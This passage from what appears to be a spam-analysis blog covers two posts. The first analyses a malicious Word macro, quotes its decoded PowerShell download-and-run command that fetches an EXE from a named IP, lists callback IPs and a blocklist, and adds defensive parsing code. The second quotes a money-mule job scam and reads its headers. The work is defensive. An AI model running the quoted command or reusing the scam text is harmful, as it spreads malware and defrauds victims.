
Showing posts with label Palestine. Show all posts

Wednesday, 18 March 2015

Malware spam: "December unpaid invoice notification"

This spam comes with no body text, but does come with a malicious attachment.

From:    Korey Mack
Date:    18 March 2015 at 11:04
Subject:    December unpaid invoice notification
So far I have only seen a single sample with an attached file called 11IDJ325.doc which is undetected by AV vendors. Inside is a malicious macro [pastebin] with an encrypted section that executes this:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\huiUGI8t8dsF.cab'); expand %TEMP%\huiUGI8t8dsF.cab %TEMP%\huiUGI8t8dsF.exe; start %TEMP%\huiUGI8t8dsF.exe;
Although the EXE file from 176.31.28.244 (OVH, France / Bitweb LLC, Russia) is downloaded as a CAB file and then EXPANDed to an EXE, there is in fact no file transformation happening at all (which is odd). This executable has a detection rate of 2/57.
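Two checks an analyst would run on this sample, written here as an added example (not code from the post): a triage of the decoded macro command line that pulls out the indicators worth alerting on (PowerShell with the execution policy bypassed, a WebClient download, a CAB "expanded" into an EXE and started from %TEMP%), plus a magic-byte check that shows why the expand step is a no-op. The command line is the one quoted above and is treated as an inert string; the indicator names and the dataclass are this example's own choices, and nothing is fetched.

```python
import re
from dataclasses import dataclass, field

# The command line quoted in the post, embedded as a constant. It is only
# pattern-matched here; the URL is never contacted.
SAMPLE_CMD = (
    "cmd /K powershell.exe -ExecutionPolicy bypass -noprofile "
    "(New-Object System.Net.WebClient).DownloadFile("
    "'http://176.31.28.244/smoozy/shake.exe','%TEMP%\\huiUGI8t8dsF.cab'); "
    "expand %TEMP%\\huiUGI8t8dsF.cab %TEMP%\\huiUGI8t8dsF.exe; "
    "start %TEMP%\\huiUGI8t8dsF.exe;"
)

# Indicator patterns; the names are hypothetical labels chosen for this example.
INDICATORS = {
    "powershell_bypass": re.compile(
        r"powershell(?:\.exe)?\b.*-executionpolicy\s+bypass", re.I),
    "webclient_download": re.compile(r"\.DownloadFile\(", re.I),
    "expand_cab_to_exe": re.compile(r"\bexpand\b\s+\S+\.cab\s+\S+\.exe", re.I),
    "start_from_temp": re.compile(r"\bstart\b\s+%TEMP%\\", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
TEMP_PATH_RE = re.compile(r"%TEMP%\\[\w.]+")


@dataclass
class Triage:
    indicators: list = field(default_factory=list)  # matched indicator names
    urls: list = field(default_factory=list)        # download locations
    dropped_paths: list = field(default_factory=list)  # files written to %TEMP%


def triage_command(cmd: str) -> Triage:
    """Extract detection-relevant features from a decoded macro command line."""
    t = Triage()
    for name, pattern in INDICATORS.items():
        if pattern.search(cmd):
            t.indicators.append(name)
    t.urls = URL_RE.findall(cmd)
    t.dropped_paths = sorted(set(TEMP_PATH_RE.findall(cmd)))
    return t


def classify_payload(data: bytes) -> str:
    """Identify what was really downloaded from its leading bytes.

    A genuine cabinet starts with 'MSCF'; a Windows executable starts with
    'MZ'. The post observes that the file fetched as a .cab was already an
    EXE, so 'expand' had nothing to transform.
    """
    if data.startswith(b"MSCF"):
        return "cab"
    if data.startswith(b"MZ"):
        return "pe"
    return "unknown"


if __name__ == "__main__":
    result = triage_command(SAMPLE_CMD)
    print("indicators:", result.indicators)
    print("urls:", result.urls)
    print("dropped:", result.dropped_paths)
    # Constructed header bytes standing in for the two file types.
    print(classify_payload(b"MZ\x90\x00" + b"\x00" * 60))  # pe
    print(classify_payload(b"MSCF" + b"\x00" * 32))        # cab
```

The command-line patterns are deliberately loose (case-insensitive, tolerant of extra switches) because the same download-and-run chain shows up with different file names from one spam run to the next; the payload check is the quick way to confirm the "no transformation" observation on any future sample.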

This Malwr report shows it downloading a DLL with an MD5 of a40e588e614e6a4c9253d261275288bf [VT 4/57] which is the same payload as found in this earlier spam run, along with another executable with an MD5 of 409397f092d3407f95be42903172cf06 which is not in the VirusTotal database. The report also shows the malware phoning home to the following IPs:

31.25.77.154 (Call U Communications, Palestine)
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
188.165.5.194 (OVH, Ireland)
188.165.26.237 (OVH, Latvia)
115.241.60.56 (Reliance Communication, India)
46.19.143.151 (Private Layer INC, Switzerland)

Recommended blocklist:
31.25.77.154
95.163.121.0/24
188.165.5.194
188.165.26.237
115.241.60.56
46.19.143.151
176.31.28.244
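The blocklist above mixes single hosts with a /24, so a naive string comparison against firewall or proxy logs would miss the Russian range. As an added example (not code from the post), here is a small matcher that parses the list into networks and runs it over a few constructed outbound-connection log lines; the log format is hypothetical, and the two destination addresses not taken from the post (95.163.121.40 and 192.0.2.10) are made up for the test.

```python
import ipaddress
import re

# The blocklist exactly as published in the post above.
BLOCKLIST = """
31.25.77.154
95.163.121.0/24
188.165.5.194
188.165.26.237
115.241.60.56
46.19.143.151
176.31.28.244
"""

# Constructed sample log in a hypothetical "<time> <src> -> <dst>:<port>" format.
# 95.163.121.40 is a made-up host inside the listed /24; 192.0.2.10 is a
# documentation address used as a benign destination.
SAMPLE_LOG = """\
2015-03-18T11:10:02 10.0.0.15 -> 176.31.28.244:80
2015-03-18T11:10:09 10.0.0.15 -> 95.163.121.40:443
2015-03-18T11:11:30 10.0.0.22 -> 192.0.2.10:443
2015-03-18T11:12:01 10.0.0.15 -> 31.25.77.154:8080
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+->\s+(\S+):(\d+)$")


def parse_blocklist(text: str) -> list:
    """Turn each non-empty line into an ip_network; bare IPs become /32s."""
    nets = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # allow trailing comments
        if line:
            nets.append(ipaddress.ip_network(line, strict=False))
    return nets


def matching_entry(ip: str, nets: list):
    """Return the blocklist entry that covers ip, or None."""
    addr = ipaddress.ip_address(ip)
    for net in nets:
        if addr in net:
            return str(net)
    return None


def scan_log(text: str, nets: list) -> list:
    """Yield (src, dst, port, entry) for every line whose destination is listed."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _ts, src, dst, port = m.groups()
        entry = matching_entry(dst, nets)
        if entry:
            hits.append((src, dst, int(port), entry))
    return hits


if __name__ == "__main__":
    nets = parse_blocklist(BLOCKLIST)
    for hit in scan_log(SAMPLE_LOG, nets):
        print("blocked destination:", hit)
```

Running it shows three of the four sample connections matching, including the one to 95.163.121.40 that only the /24 entry catches; the same `parse_blocklist` output can be fed straight into whatever firewall or proxy format you maintain.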



Tuesday, 24 August 2010

There's more to this than meets the eye..

This is a straightforward money mule pitch, so nothing very interesting in the message itself..

From: james roberts <jamesroberts02@sify.com>
Reply-to: james.roberts@sify.com
Date: 24 August 2010 13:13
subject: JOB OFFER:APPLY IF YOU ARE INTERESTED.
Hello,

My name is JAMES ROBERTS, a designer also the Manager of JAMES ROBERTS FABRIC and Consultant live and work here in United Kingdom, will you like to work online from home and get paid without affecting your present job?

Actually I need a representative who can be working for the company as online book-keeper. We make lots of supplies to some of our clients in the USA/CANADA/EUROPE, for which I do come to USA/CANADA/EUROPE to receive payment and have it cashed after I supply them raw materials. It's always too expensive and stressful for me to come down and receive such payment twice in a month so I therefore decided to contact you.

I am willing to pay you 10% for every payment receive by you from our clients who makes payment through you. Please note you don't have to be a book keeper to apply for the job.

Kindly get back to me as soon as possible if you are interested in this job offer with your details:

FULL NAMES...................
ADDRESS ..................
STATE..................
ZIPCODE................
COUNTRY................
PHONE NUMBER(S)........
GENDER.................
AGE....................
OCCUPATION.............

Yours Faithfully,

JAMES ROBERTS

But the headers tell an interesting story..

Received: from mail.pna.ps ([213.244.123.84])
    by ********** with esmtp (Exim 4.69)
    id 1Onsd0-0004Yt-Jc
    for **********; Tue, 24 Aug 2010 13:29:22 +0100
Received: from User (unknown [60.18.167.17])
    by mail.pna.ps (Postfix) with ESMTPA id ED6A94476F;
    Tue, 24 Aug 2010 15:12:09 +0300 (IDT)

You can only really trust the last hop before it hits your mail server (in truth, not always then either). That IP is 213.244.123.84 which is indeed mail.pna.ps.

So what the heck is .ps? Well, it turns out to be the TLD for Palestine, and the PNA is the Palestinian National Authority, with servers that look to be based in Ramallah on the West Bank. So, it looks like the PNA mail servers are either insecure or compromised.
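The point about only trusting the last hop is easy to get wrong when reading headers by hand, because receiving servers prepend their Received line, so the trustworthy hop is the top one and the sender-controlled hops are underneath it. As an added example (not code from the post), this parser unfolds the headers quoted above, extracts each hop's claimed source host, bracketed IP and receiving host, and returns the top hop as the only one worth acting on. The header text is the post's own, with its redactions kept; the dictionary keys are this example's choice.

```python
import re

# The Received chain quoted in the post, as a constant (asterisks are the
# post's own redaction of the receiving server and recipient).
SAMPLE_HEADERS = """\
Received: from mail.pna.ps ([213.244.123.84])
    by ********** with esmtp (Exim 4.69)
    id 1Onsd0-0004Yt-Jc
    for **********; Tue, 24 Aug 2010 13:29:22 +0100
Received: from User (unknown [60.18.167.17])
    by mail.pna.ps (Postfix) with ESMTPA id ED6A94476F;
    Tue, 24 Aug 2010 15:12:09 +0300 (IDT)
"""

# "from <host> (<comment>) by <host>" at the start of an unfolded Received line.
HOP_RE = re.compile(r"^Received:\s*from\s+(\S+)\s*(?:\(([^)]*)\))?\s*by\s+(\S+)", re.I)
# First bracketed IPv4 literal on the line, which is the address the
# receiving server actually saw.
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def unfold(raw: str) -> list:
    """Join RFC 5322 continuation lines (leading whitespace) onto their header."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line.rstrip())
    return lines


def parse_received(raw: str) -> list:
    """Return one dict per Received header, in header order (top first)."""
    hops = []
    for line in unfold(raw):
        m = HOP_RE.match(line)
        if not m:
            continue
        ip = IP_RE.search(line)
        hops.append({
            "from": m.group(1),
            "ip": ip.group(1) if ip else None,
            "by": m.group(3),
            "authenticated": " with ESMTPA " in f" {line} ".replace("\n", " ")
                             or re.search(r"\bwith\s+ESMTPS?A\b", line, re.I) is not None,
        })
    return hops


def trusted_hop(hops: list):
    """The hop our own server wrote is the first one; everything below it was
    supplied by the sending side and may be forged."""
    return hops[0] if hops else None


if __name__ == "__main__":
    hops = parse_received(SAMPLE_HEADERS)
    for i, hop in enumerate(hops):
        print(i, hop)
    print("act on:", trusted_hop(hops)["ip"])  # 213.244.123.84
```

The top hop yields 213.244.123.84 for mail.pna.ps, which is the address the post says can be relied on. The second hop is informative rather than trusted: Postfix writes `with ESMTPA` when the client authenticated, so the `authenticated` flag on that hop is consistent with the post's reading that the PNA server was relaying for a logged-in but abused account rather than acting as an open relay, though the header alone cannot prove which.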

Did you even know that Palestine had a TLD of its own? I didn't.. so I guess this spam has taught me something!